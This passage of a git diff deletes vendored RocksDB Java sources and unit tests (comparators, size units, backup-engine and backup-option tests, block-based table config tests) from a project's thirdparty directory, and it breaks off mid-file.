--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/ReverseBytewiseComparator.java
+++ /dev/null
@@ -1,37 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb.util;
-
-import org.rocksdb.BuiltinComparator;
-import org.rocksdb.ComparatorOptions;
-import org.rocksdb.Slice;
-
-/**
- * This is a Java Native implementation of the C++
- * equivalent ReverseBytewiseComparatorImpl using {@link Slice}
- *
- * The performance of Comparators implemented in Java is always
- * less than their C++ counterparts due to the bridging overhead,
- * as such you likely don't want to use this apart from benchmarking
- * and you most likely instead wanted
- * {@link BuiltinComparator#REVERSE_BYTEWISE_COMPARATOR}
- */
-public class ReverseBytewiseComparator extends BytewiseComparator {
-
-  public ReverseBytewiseComparator(final ComparatorOptions copt) {
-    super(copt);
-  }
-
-  @Override
-  public String name() {
-    return "rocksdb.java.ReverseBytewiseComparator";
-  }
-
-  @Override
-  public int compare(final Slice a, final Slice b) {
-    return -super.compare(a, b);
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/SizeUnit.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/SizeUnit.java
deleted file mode 100644
index 0f717e8..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/SizeUnit.java
+++ /dev/null
@@ -1,16 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb.util;
-
-public class SizeUnit {
-  public static final long KB = 1024L;
-  public static final long MB = KB * KB;
-  public static final long GB = KB * MB;
-  public static final long TB = KB * GB;
-  public static final long PB = KB * TB;
-
-  private SizeUnit() {}
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/AbstractComparatorTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/AbstractComparatorTest.java
deleted file mode 100644
index 91a1e99..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/AbstractComparatorTest.java
+++ /dev/null
@@ -1,199 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.io.IOException;
-import java.nio.file.*;
-import java.util.ArrayList;
-import java.util.Arrays;
-import java.util.List;
-import java.util.Random;
-
-import static org.assertj.core.api.Assertions.assertThat;
-import static org.rocksdb.Types.byteToInt;
-import static org.rocksdb.Types.intToByte;
-
-/**
- * Abstract tests for both Comparator and DirectComparator
- */
-public abstract class AbstractComparatorTest {
-
-  /**
-   * Get a comparator which will expect Integer keys
-   * and determine an ascending order
-   *
-   * @return An integer ascending order key comparator
-   */
-  public abstract AbstractComparator getAscendingIntKeyComparator();
-
-  /**
-   * Test which stores random keys into the database
-   * using an @see getAscendingIntKeyComparator
-   * it then checks that these keys are read back in
-   * ascending order
-   *
-   * @param db_path A path where we can store database
-   *                files temporarily
-   *
-   * @throws java.io.IOException if IO error happens.
-   */
-  public void testRoundtrip(final Path db_path) throws IOException,
-      RocksDBException {
-    try (final AbstractComparator comparator = getAscendingIntKeyComparator();
-         final Options opt = new Options()
-             .setCreateIfMissing(true)
-             .setComparator(comparator)) {
-
-      // store 10,000 random integer keys
-      final int ITERATIONS = 10000;
-      try (final RocksDB db = RocksDB.open(opt, db_path.toString())) {
-        final Random random = new Random();
-        for (int i = 0; i < ITERATIONS; i++) {
-          final byte key[] = intToByte(random.nextInt());
-          // does key already exist (avoid duplicates)
-          if (i > 0 && db.get(key) != null) {
-            i--; // generate a different key
-          } else {
-            db.put(key, "value".getBytes());
-          }
-        }
-      }
-
-      // re-open db and read from start to end
-      // integer keys should be in ascending
-      // order as defined by SimpleIntComparator
-      try (final RocksDB db = RocksDB.open(opt, db_path.toString());
-           final RocksIterator it = db.newIterator()) {
-        it.seekToFirst();
-        int lastKey = Integer.MIN_VALUE;
-        int count = 0;
-        for (it.seekToFirst(); it.isValid(); it.next()) {
-          final int thisKey = byteToInt(it.key());
-          assertThat(thisKey).isGreaterThan(lastKey);
-          lastKey = thisKey;
-          count++;
-        }
-        assertThat(count).isEqualTo(ITERATIONS);
-      }
-    }
-  }
-
-  /**
-   * Test which stores random keys into a column family
-   * in the database
-   * using an @see getAscendingIntKeyComparator
-   * it then checks that these keys are read back in
-   * ascending order
-   *
-   * @param db_path A path where we can store database
-   *                files temporarily
-   *
-   * @throws java.io.IOException if IO error happens.
-   */
-  public void testRoundtripCf(final Path db_path) throws IOException,
-      RocksDBException {
-
-    try(final AbstractComparator comparator = getAscendingIntKeyComparator()) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-          new ColumnFamilyDescriptor("new_cf".getBytes(),
-              new ColumnFamilyOptions().setComparator(comparator))
-      );
-
-      final List<ColumnFamilyHandle> cfHandles = new ArrayList<>();
-
-      try (final DBOptions opt = new DBOptions().
-          setCreateIfMissing(true).
-          setCreateMissingColumnFamilies(true)) {
-
-        // store 10,000 random integer keys
-        final int ITERATIONS = 10000;
-
-        try (final RocksDB db = RocksDB.open(opt, db_path.toString(),
-            cfDescriptors, cfHandles)) {
-          try {
-            assertThat(cfDescriptors.size()).isEqualTo(2);
-            assertThat(cfHandles.size()).isEqualTo(2);
-
-            final Random random = new Random();
-            for (int i = 0; i < ITERATIONS; i++) {
-              final byte key[] = intToByte(random.nextInt());
-              if (i > 0 && db.get(cfHandles.get(1), key) != null) {
-                // does key already exist (avoid duplicates)
-                i--; // generate a different key
-              } else {
-                db.put(cfHandles.get(1), key, "value".getBytes());
-              }
-            }
-          } finally {
-            for (final ColumnFamilyHandle handle : cfHandles) {
-              handle.close();
-            }
-          }
-          cfHandles.clear();
-        }
-
-        // re-open db and read from start to end
-        // integer keys should be in ascending
-        // order as defined by SimpleIntComparator
-        try (final RocksDB db = RocksDB.open(opt, db_path.toString(),
-            cfDescriptors, cfHandles);
-             final RocksIterator it = db.newIterator(cfHandles.get(1))) {
-          try {
-            assertThat(cfDescriptors.size()).isEqualTo(2);
-            assertThat(cfHandles.size()).isEqualTo(2);
-
-            it.seekToFirst();
-            int lastKey = Integer.MIN_VALUE;
-            int count = 0;
-            for (it.seekToFirst(); it.isValid(); it.next()) {
-              final int thisKey = byteToInt(it.key());
-              assertThat(thisKey).isGreaterThan(lastKey);
-              lastKey = thisKey;
-              count++;
-            }
-
-            assertThat(count).isEqualTo(ITERATIONS);
-
-          } finally {
-            for (final ColumnFamilyHandle handle : cfHandles) {
-              handle.close();
-            }
-          }
-          cfHandles.clear();
-        }
-      }
-    }
-  }
-
-  /**
-   * Compares integer keys
-   * so that they are in ascending order
-   *
-   * @param a 4-bytes representing an integer key
-   * @param b 4-bytes representing an integer key
-   *
-   * @return negative if a &lt; b, 0 if a == b, positive otherwise
-   */
-  protected final int compareIntKeys(final byte[] a, final byte[] b) {
-
-    final int iA = byteToInt(a);
-    final int iB = byteToInt(b);
-
-    // protect against int key calculation overflow
-    final double diff = (double)iA - iB;
-    final int result;
-    if (diff < Integer.MIN_VALUE) {
-      result = Integer.MIN_VALUE;
-    } else if(diff > Integer.MAX_VALUE) {
-      result = Integer.MAX_VALUE;
-    } else {
-      result = (int)diff;
-    }
-
-    return result;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/BackupEngineTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/BackupEngineTest.java
deleted file mode 100644
index 1caae50..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/BackupEngineTest.java
+++ /dev/null
@@ -1,240 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.util.List;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class BackupEngineTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Rule
-  public TemporaryFolder backupFolder = new TemporaryFolder();
-
-  @Test
-  public void backupDb() throws RocksDBException {
-    // Open empty database.
-    try(final Options opt = new Options().setCreateIfMissing(true);
-        final RocksDB db = RocksDB.open(opt,
-            dbFolder.getRoot().getAbsolutePath())) {
-
-      // Fill database with some test values
-      prepareDatabase(db);
-
-      // Create two backups
-      try(final BackupableDBOptions bopt = new BackupableDBOptions(
-          backupFolder.getRoot().getAbsolutePath());
-          final BackupEngine be = BackupEngine.open(opt.getEnv(), bopt)) {
-        be.createNewBackup(db, false);
-        be.createNewBackup(db, true);
-        verifyNumberOfValidBackups(be, 2);
-      }
-    }
-  }
-
-  @Test
-  public void deleteBackup() throws RocksDBException {
-    // Open empty database.
-    try(final Options opt = new Options().setCreateIfMissing(true);
-        final RocksDB db = RocksDB.open(opt,
-            dbFolder.getRoot().getAbsolutePath())) {
-      // Fill database with some test values
-      prepareDatabase(db);
-      // Create two backups
-      try(final BackupableDBOptions bopt = new BackupableDBOptions(
-          backupFolder.getRoot().getAbsolutePath());
-          final BackupEngine be = BackupEngine.open(opt.getEnv(), bopt)) {
-        be.createNewBackup(db, false);
-        be.createNewBackup(db, true);
-        final List<BackupInfo> backupInfo =
-            verifyNumberOfValidBackups(be, 2);
-        // Delete the first backup
-        be.deleteBackup(backupInfo.get(0).backupId());
-        final List<BackupInfo> newBackupInfo =
-            verifyNumberOfValidBackups(be, 1);
-
-        // The second backup must remain.
-        assertThat(newBackupInfo.get(0).backupId()).
-            isEqualTo(backupInfo.get(1).backupId());
-      }
-    }
-  }
-
-  @Test
-  public void purgeOldBackups() throws RocksDBException {
-    // Open empty database.
-    try(final Options opt = new Options().setCreateIfMissing(true);
-        final RocksDB db = RocksDB.open(opt,
-            dbFolder.getRoot().getAbsolutePath())) {
-      // Fill database with some test values
-      prepareDatabase(db);
-      // Create four backups
-      try(final BackupableDBOptions bopt = new BackupableDBOptions(
-          backupFolder.getRoot().getAbsolutePath());
-          final BackupEngine be = BackupEngine.open(opt.getEnv(), bopt)) {
-        be.createNewBackup(db, false);
-        be.createNewBackup(db, true);
-        be.createNewBackup(db, true);
-        be.createNewBackup(db, true);
-        final List<BackupInfo> backupInfo =
-            verifyNumberOfValidBackups(be, 4);
-        // Delete everything except the latest backup
-        be.purgeOldBackups(1);
-        final List<BackupInfo> newBackupInfo =
-            verifyNumberOfValidBackups(be, 1);
-        // The latest backup must remain.
-        assertThat(newBackupInfo.get(0).backupId()).
-            isEqualTo(backupInfo.get(3).backupId());
-      }
-    }
-  }
-
-  @Test
-  public void restoreLatestBackup() throws RocksDBException {
-    try(final Options opt = new Options().setCreateIfMissing(true)) {
-      // Open empty database.
-      RocksDB db = null;
-      try {
-        db = RocksDB.open(opt,
-            dbFolder.getRoot().getAbsolutePath());
-        // Fill database with some test values
-        prepareDatabase(db);
-
-        try (final BackupableDBOptions bopt = new BackupableDBOptions(
-            backupFolder.getRoot().getAbsolutePath());
-             final BackupEngine be = BackupEngine.open(opt.getEnv(), bopt)) {
-          be.createNewBackup(db, true);
-          verifyNumberOfValidBackups(be, 1);
-          db.put("key1".getBytes(), "valueV2".getBytes());
-          db.put("key2".getBytes(), "valueV2".getBytes());
-          be.createNewBackup(db, true);
-          verifyNumberOfValidBackups(be, 2);
-          db.put("key1".getBytes(), "valueV3".getBytes());
-          db.put("key2".getBytes(), "valueV3".getBytes());
-          assertThat(new String(db.get("key1".getBytes()))).endsWith("V3");
-          assertThat(new String(db.get("key2".getBytes()))).endsWith("V3");
-
-          db.close();
-          db = null;
-
-          verifyNumberOfValidBackups(be, 2);
-          // restore db from latest backup
-          try(final RestoreOptions ropts = new RestoreOptions(false)) {
-            be.restoreDbFromLatestBackup(dbFolder.getRoot().getAbsolutePath(),
-                dbFolder.getRoot().getAbsolutePath(), ropts);
-          }
-
-          // Open database again.
-          db = RocksDB.open(opt, dbFolder.getRoot().getAbsolutePath());
-
-          // Values must have suffix V2 because of restoring latest backup.
-          assertThat(new String(db.get("key1".getBytes()))).endsWith("V2");
-          assertThat(new String(db.get("key2".getBytes()))).endsWith("V2");
-        }
-      } finally {
-        if(db != null) {
-          db.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void restoreFromBackup()
-      throws RocksDBException {
-    try(final Options opt = new Options().setCreateIfMissing(true)) {
-      RocksDB db = null;
-      try {
-        // Open empty database.
-        db = RocksDB.open(opt,
-            dbFolder.getRoot().getAbsolutePath());
-        // Fill database with some test values
-        prepareDatabase(db);
-        try (final BackupableDBOptions bopt = new BackupableDBOptions(
-            backupFolder.getRoot().getAbsolutePath());
-             final BackupEngine be = BackupEngine.open(opt.getEnv(), bopt)) {
-          be.createNewBackup(db, true);
-          verifyNumberOfValidBackups(be, 1);
-          db.put("key1".getBytes(), "valueV2".getBytes());
-          db.put("key2".getBytes(), "valueV2".getBytes());
-          be.createNewBackup(db, true);
-          verifyNumberOfValidBackups(be, 2);
-          db.put("key1".getBytes(), "valueV3".getBytes());
-          db.put("key2".getBytes(), "valueV3".getBytes());
-          assertThat(new String(db.get("key1".getBytes()))).endsWith("V3");
-          assertThat(new String(db.get("key2".getBytes()))).endsWith("V3");
-
-          //close the database
-          db.close();
-          db = null;
-
-          //restore the backup
-          final List<BackupInfo> backupInfo = verifyNumberOfValidBackups(be, 2);
-          // restore db from first backup
-          be.restoreDbFromBackup(backupInfo.get(0).backupId(),
-              dbFolder.getRoot().getAbsolutePath(),
-              dbFolder.getRoot().getAbsolutePath(),
-              new RestoreOptions(false));
-          // Open database again.
-          db = RocksDB.open(opt,
-              dbFolder.getRoot().getAbsolutePath());
-          // Values must have suffix V2 because of restoring latest backup.
-          assertThat(new String(db.get("key1".getBytes()))).endsWith("V1");
-          assertThat(new String(db.get("key2".getBytes()))).endsWith("V1");
-        }
-      } finally {
-        if(db != null) {
-          db.close();
-        }
-      }
-    }
-  }
-
-  /**
-   * Verify backups.
-   *
-   * @param be {@link BackupEngine} instance.
-   * @param expectedNumberOfBackups numerical value
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  private List<BackupInfo> verifyNumberOfValidBackups(final BackupEngine be,
-      final int expectedNumberOfBackups) throws RocksDBException {
-    // Verify that backups exist
-    assertThat(be.getCorruptedBackups().length).
-        isEqualTo(0);
-    be.garbageCollect();
-    final List<BackupInfo> backupInfo = be.getBackupInfo();
-    assertThat(backupInfo.size()).
-        isEqualTo(expectedNumberOfBackups);
-    return backupInfo;
-  }
-
-  /**
-   * Fill database with some test values.
-   *
-   * @param db {@link RocksDB} instance.
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  private void prepareDatabase(final RocksDB db)
-      throws RocksDBException {
-    db.put("key1".getBytes(), "valueV1".getBytes());
-    db.put("key2".getBytes(), "valueV1".getBytes());
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/BackupableDBOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/BackupableDBOptionsTest.java
deleted file mode 100644
index c223014..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/BackupableDBOptionsTest.java
+++ /dev/null
@@ -1,351 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-import java.util.Random;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.ExpectedException;
-
-public class BackupableDBOptionsTest {
-
-  private final static String ARBITRARY_PATH =
-      System.getProperty("java.io.tmpdir");
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public ExpectedException exception = ExpectedException.none();
-
-  public static final Random rand = PlatformRandomHelper.
-      getPlatformSpecificRandomFactory();
-
-  @Test
-  public void backupDir() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      assertThat(backupableDBOptions.backupDir()).
-          isEqualTo(ARBITRARY_PATH);
-    }
-  }
-
-  @Test
-  public void env() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      assertThat(backupableDBOptions.backupEnv()).
-          isNull();
-
-      try(final Env env = new RocksMemEnv()) {
-        backupableDBOptions.setBackupEnv(env);
-        assertThat(backupableDBOptions.backupEnv())
-            .isEqualTo(env);
-      }
-    }
-  }
-
-  @Test
-  public void shareTableFiles() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      final boolean value = rand.nextBoolean();
-      backupableDBOptions.setShareTableFiles(value);
-      assertThat(backupableDBOptions.shareTableFiles()).
-          isEqualTo(value);
-    }
-  }
-
-  @Test
-  public void infoLog() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      assertThat(backupableDBOptions.infoLog()).
-          isNull();
-
-      try(final Options options = new Options();
-          final Logger logger = new Logger(options){
-            @Override
-            protected void log(InfoLogLevel infoLogLevel, String logMsg) {
-
-            }
-          }) {
-        backupableDBOptions.setInfoLog(logger);
-        assertThat(backupableDBOptions.infoLog())
-            .isEqualTo(logger);
-      }
-    }
-  }
-
-  @Test
-  public void sync() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      final boolean value = rand.nextBoolean();
-      backupableDBOptions.setSync(value);
-      assertThat(backupableDBOptions.sync()).isEqualTo(value);
-    }
-  }
-
-  @Test
-  public void destroyOldData() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH);) {
-      final boolean value = rand.nextBoolean();
-      backupableDBOptions.setDestroyOldData(value);
-      assertThat(backupableDBOptions.destroyOldData()).
-          isEqualTo(value);
-    }
-  }
-
-  @Test
-  public void backupLogFiles() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      final boolean value = rand.nextBoolean();
-      backupableDBOptions.setBackupLogFiles(value);
-      assertThat(backupableDBOptions.backupLogFiles()).
-          isEqualTo(value);
-    }
-  }
-
-  @Test
-  public void backupRateLimit() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      final long value = Math.abs(rand.nextLong());
-      backupableDBOptions.setBackupRateLimit(value);
-      assertThat(backupableDBOptions.backupRateLimit()).
-          isEqualTo(value);
-      // negative will be mapped to 0
-      backupableDBOptions.setBackupRateLimit(-1);
-      assertThat(backupableDBOptions.backupRateLimit()).
-          isEqualTo(0);
-    }
-  }
-
-  @Test
-  public void backupRateLimiter() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      assertThat(backupableDBOptions.backupEnv()).
-          isNull();
-
-      try(final RateLimiter backupRateLimiter =
-              new RateLimiter(999)) {
-        backupableDBOptions.setBackupRateLimiter(backupRateLimiter);
-        assertThat(backupableDBOptions.backupRateLimiter())
-            .isEqualTo(backupRateLimiter);
-      }
-    }
-  }
-
-  @Test
-  public void restoreRateLimit() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      final long value = Math.abs(rand.nextLong());
-      backupableDBOptions.setRestoreRateLimit(value);
-      assertThat(backupableDBOptions.restoreRateLimit()).
-          isEqualTo(value);
-      // negative will be mapped to 0
-      backupableDBOptions.setRestoreRateLimit(-1);
-      assertThat(backupableDBOptions.restoreRateLimit()).
-          isEqualTo(0);
-    }
-  }
-
-  @Test
-  public void restoreRateLimiter() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      assertThat(backupableDBOptions.backupEnv()).
-          isNull();
-
-      try(final RateLimiter restoreRateLimiter =
-              new RateLimiter(911)) {
-        backupableDBOptions.setRestoreRateLimiter(restoreRateLimiter);
-        assertThat(backupableDBOptions.restoreRateLimiter())
-            .isEqualTo(restoreRateLimiter);
-      }
-    }
-  }
-
-  @Test
-  public void shareFilesWithChecksum() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      boolean value = rand.nextBoolean();
-      backupableDBOptions.setShareFilesWithChecksum(value);
-      assertThat(backupableDBOptions.shareFilesWithChecksum()).
-          isEqualTo(value);
-    }
-  }
-
-  @Test
-  public void maxBackgroundOperations() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      final int value = rand.nextInt();
-      backupableDBOptions.setMaxBackgroundOperations(value);
-      assertThat(backupableDBOptions.maxBackgroundOperations()).
-          isEqualTo(value);
-    }
-  }
-
-  @Test
-  public void callbackTriggerIntervalSize() {
-    try (final BackupableDBOptions backupableDBOptions =
-             new BackupableDBOptions(ARBITRARY_PATH)) {
-      final long value = rand.nextLong();
-      backupableDBOptions.setCallbackTriggerIntervalSize(value);
-      assertThat(backupableDBOptions.callbackTriggerIntervalSize()).
-          isEqualTo(value);
-    }
-  }
-
-  @Test
-  public void failBackupDirIsNull() {
-    exception.expect(IllegalArgumentException.class);
-    try (final BackupableDBOptions opts = new BackupableDBOptions(null)) {
-      //no-op
-    }
-  }
-
-  @Test
-  public void failBackupDirIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.backupDir();
-    }
-  }
-
-  @Test
-  public void failSetShareTableFilesIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.setShareTableFiles(true);
-    }
-  }
-
-  @Test
-  public void failShareTableFilesIfDisposed() {
-    try (BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.shareTableFiles();
-    }
-  }
-
-  @Test
-  public void failSetSyncIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.setSync(true);
-    }
-  }
-
-  @Test
-  public void failSyncIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.sync();
-    }
-  }
-
-  @Test
-  public void failSetDestroyOldDataIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.setDestroyOldData(true);
-    }
-  }
-
-  @Test
-  public void failDestroyOldDataIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.destroyOldData();
-    }
-  }
-
-  @Test
-  public void failSetBackupLogFilesIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.setBackupLogFiles(true);
-    }
-  }
-
-  @Test
-  public void failBackupLogFilesIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.backupLogFiles();
-    }
-  }
-
-  @Test
-  public void failSetBackupRateLimitIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.setBackupRateLimit(1);
-    }
-  }
-
-  @Test
-  public void failBackupRateLimitIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.backupRateLimit();
-    }
-  }
-
-  @Test
-  public void failSetRestoreRateLimitIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.setRestoreRateLimit(1);
-    }
-  }
-
-  @Test
-  public void failRestoreRateLimitIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.restoreRateLimit();
-    }
-  }
-
-  @Test
-  public void failSetShareFilesWithChecksumIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.setShareFilesWithChecksum(true);
-    }
-  }
-
-  @Test
-  public void failShareFilesWithChecksumIfDisposed() {
-    try (final BackupableDBOptions options =
-             setupUninitializedBackupableDBOptions(exception)) {
-      options.shareFilesWithChecksum();
-    }
-  }
-
-  private BackupableDBOptions setupUninitializedBackupableDBOptions(
-      ExpectedException exception) {
-    final BackupableDBOptions backupableDBOptions =
-        new BackupableDBOptions(ARBITRARY_PATH);
-    backupableDBOptions.close();
-    exception.expect(AssertionError.class);
-    return backupableDBOptions;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/BlockBasedTableConfigTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/BlockBasedTableConfigTest.java
deleted file mode 100644
index 8edc8b8..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/BlockBasedTableConfigTest.java
+++ /dev/null
@@ -1,171 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class BlockBasedTableConfigTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void noBlockCache() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setNoBlockCache(true);
-    assertThat(blockBasedTableConfig.noBlockCache()).isTrue();
-  }
-
-  @Test
-  public void blockCacheSize() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setBlockCacheSize(8 * 1024);
-    assertThat(blockBasedTableConfig.blockCacheSize()).
-        isEqualTo(8 * 1024);
-  }
-
-  @Test
-  public void blockSizeDeviation() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setBlockSizeDeviation(12);
-    assertThat(blockBasedTableConfig.blockSizeDeviation()).
-        isEqualTo(12);
-  }
-
-  @Test
-  public void blockRestartInterval() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setBlockRestartInterval(15);
-    assertThat(blockBasedTableConfig.blockRestartInterval()).
-        isEqualTo(15);
-  }
-
-  @Test
-  public void wholeKeyFiltering() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setWholeKeyFiltering(false);
-    assertThat(blockBasedTableConfig.wholeKeyFiltering()).
-        isFalse();
-  }
-
-  @Test
-  public void cacheIndexAndFilterBlocks() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setCacheIndexAndFilterBlocks(true);
-    assertThat(blockBasedTableConfig.cacheIndexAndFilterBlocks()).
-        isTrue();
-
-  }
-
-  @Test
-  public void hashIndexAllowCollision() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setHashIndexAllowCollision(false);
-    assertThat(blockBasedTableConfig.hashIndexAllowCollision()).
-        isFalse();
-  }
-
-  @Test
-  public void blockCacheCompressedSize() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setBlockCacheCompressedSize(40);
-    assertThat(blockBasedTableConfig.blockCacheCompressedSize()).
-        isEqualTo(40);
-  }
-
-  @Test
-  public void checksumType() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    assertThat(ChecksumType.values().length).isEqualTo(3);
-    assertThat(ChecksumType.valueOf("kxxHash")).
-        isEqualTo(ChecksumType.kxxHash);
-    blockBasedTableConfig.setChecksumType(ChecksumType.kNoChecksum);
-    blockBasedTableConfig.setChecksumType(ChecksumType.kxxHash);
-    assertThat(blockBasedTableConfig.checksumType().equals(
-        ChecksumType.kxxHash));
-  }
-
-  @Test
-  public void indexType() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    assertThat(IndexType.values().length).isEqualTo(3);
-    blockBasedTableConfig.setIndexType(IndexType.kHashSearch);
-    assertThat(blockBasedTableConfig.indexType().equals(
-        IndexType.kHashSearch));
-    assertThat(IndexType.valueOf("kBinarySearch")).isNotNull();
-    blockBasedTableConfig.setIndexType(IndexType.valueOf("kBinarySearch"));
-    assertThat(blockBasedTableConfig.indexType().equals(
-        IndexType.kBinarySearch));
-  }
-
-  @Test
-  public void blockCacheCompressedNumShardBits() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setBlockCacheCompressedNumShardBits(4);
-    assertThat(blockBasedTableConfig.blockCacheCompressedNumShardBits()).
-        isEqualTo(4);
-  }
-
-  @Test
-  public void cacheNumShardBits() {
